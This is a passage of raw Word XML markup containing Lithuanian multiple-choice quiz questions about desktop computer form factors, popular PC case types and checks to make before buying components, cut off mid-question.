    <w:p w14:paraId="01FD18C2" w14:textId="30B718BB" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:t>C)</w:t>
      </w:r>
      <w:r w:rsidR="0066332E" w:rsidRPr="005A5C28">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:t>C-ATX, ATX, mATX, mini-ITX.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65AB6E4A" w14:textId="2BBBA7FE" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CB30657" w14:textId="56E6C746" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="00D81CFC" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Kurie</w:t>
      </w:r>
      <w:r w:rsidR="00B35968" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FE0435" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">stacionarių kompiuterių </w:t>
      </w:r>
      <w:r w:rsidR="009D5F8C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>korpu</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sai populiariausi</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="500EC718" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Lietuvos rinkoje</w:t>
      </w:r>
      <w:r w:rsidR="009D5F8C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Pažymėk</w:t>
      </w:r>
      <w:r w:rsidR="002706A1" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ite</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> tinkamą atsakymą</w:t>
      </w:r>
      <w:r w:rsidR="00857251" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B07394E" w14:textId="2BBBA7FE" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:t>Midi-Tower; Full-Tower, Mini-Tower, Slim-Desktop;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F2E4F5C" w14:textId="2BBBA7FE" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:t>Micro-Tower; Full-Tower, Nano-Tower, Slim-Desktop;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA7572A" w14:textId="2BBBA7FE" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:t>Mini-Tower; Full-Tower, Nano-Tower, Slim-Desktop.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C79876" w14:textId="2BBBA7FE" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3830B52B" w14:textId="00C0E9E9" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="298F1746" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>K</w:t>
      </w:r>
      <w:r w:rsidR="00D81CFC" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>urie</w:t>
      </w:r>
      <w:r w:rsidR="2D0FC2BD" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> staciona</w:t>
      </w:r>
      <w:r w:rsidR="12050690" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>rių</w:t>
      </w:r>
      <w:r w:rsidR="2D0FC2BD" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> kompiuteri</w:t>
      </w:r>
      <w:r w:rsidR="514FAF6B" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ų korpus</w:t>
      </w:r>
      <w:r w:rsidR="00D81CFC" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ai</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="127C2CC0" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Lietuvos rinkoje</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D81CFC" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>pagal populiarumą užima antrą vietą</w:t>
      </w:r>
      <w:bookmarkStart w:id="11" w:name="_Hlk67741895"/>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:r w:rsidR="002706A1" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Pažymėkite tinkamą atsakymą</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
      <w:r w:rsidR="00857251" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA30558" w14:textId="409FED47" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:t>Full-Tower</w:t>
      </w:r>
      <w:r w:rsidR="4B14A4C2" w:rsidRPr="005A5C28">
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C10C8D3" w14:textId="1871545D" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:t>Mini-Tower</w:t>
      </w:r>
      <w:r w:rsidR="4B14A4C2" w:rsidRPr="005A5C28">
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF527E8" w14:textId="12C4F5CF" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:t>Midi-Tower</w:t>
      </w:r>
      <w:r w:rsidR="5198FE9D" w:rsidRPr="005A5C28">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A08E6CC" w14:textId="2BBBA7FE" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="128AC8B9" w14:textId="6416DC64" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002706A1" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Pratęskite teiginį:</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Prieš perkant</w:t>
      </w:r>
      <w:r w:rsidR="002706A1" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> kompiuterio</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>komponentus būtina patikrinti</w:t>
      </w:r>
      <w:r w:rsidR="002706A1" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>...</w:t>
      </w:r>
      <w:r w:rsidR="002706A1" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Pažymėkite tinkamą atsakymą</w:t>
      </w:r>
      <w:r w:rsidR="00FB2EDE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="002706A1" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="714325EA" w14:textId="22773854" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="002706A1" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="138"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="298F1746" w:rsidRPr="005A5C28">
        <w:t>r visi</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:t xml:space="preserve">pasirinkti </w:t>
      </w:r>
      <w:r w:rsidR="298F1746" w:rsidRPr="005A5C28">
        <w:t>komponentai</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:t xml:space="preserve"> pagal gamintojo rekomendaciją</w:t>
      </w:r>
      <w:r w:rsidR="00857251" w:rsidRPr="005A5C28">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:t>dera tarpusavyje</w:t>
      </w:r>
      <w:r w:rsidR="298F1746" w:rsidRPr="005A5C28">
        <w:t xml:space="preserve"> ir</w:t>
      </w:r>
      <w:r w:rsidR="6A0CC2BC" w:rsidRPr="005A5C28">
        <w:t xml:space="preserve"> fiziškai</w:t>
      </w:r>
      <w:r w:rsidR="298F1746" w:rsidRPr="005A5C28">
        <w:t xml:space="preserve"> telpa į korpusą</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38127180" w14:textId="50DAE2A1" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="002706A1" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="138"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="298F1746" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>r visi</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">pasirinkti </w:t>
      </w:r>
      <w:r w:rsidR="298F1746" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>komponentai yra nauji ir</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> pagal gamintojo rekomendaciją</w:t>
      </w:r>
      <w:r w:rsidR="298F1746" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>dera tarpusavyje</w:t>
      </w:r>
      <w:r w:rsidR="298F1746" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>bei</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="4704262C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>fiziškai</w:t>
      </w:r>
      <w:r w:rsidR="298F1746" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> telpa į korpusą</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B7269A8" w14:textId="439696A9" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="002706A1" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="138"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="298F1746" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>r visi</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> pasirinkti</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="298F1746" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">komponentai </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">atitinka keliamus kainos </w:t>
      </w:r>
      <w:r w:rsidR="004F295B" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>reikalavimus</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="298F1746" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">ir </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>pagal gamintojo rekomendaciją</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>dera</w:t>
      </w:r>
      <w:r w:rsidR="5C175C41" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> tarpusavyje</w:t>
      </w:r>
      <w:r w:rsidR="00857251" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="031EACBC" w14:textId="77777777" w:rsidR="004F295B" w:rsidRPr="005A5C28" w:rsidRDefault="004F295B" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F4C1970" w14:textId="0A440764" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="298F1746" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">6. </w:t>
      </w:r>
      <w:r w:rsidR="002706A1" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Pratęskite teigin</w:t>
      </w:r>
      <w:r w:rsidR="08A20E4F" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">į: </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Renkantis</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002706A1" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">kompiuterio </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">komponentus, </w:t>
      </w:r>
      <w:r w:rsidR="6566460A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>būtina</w:t>
      </w:r>
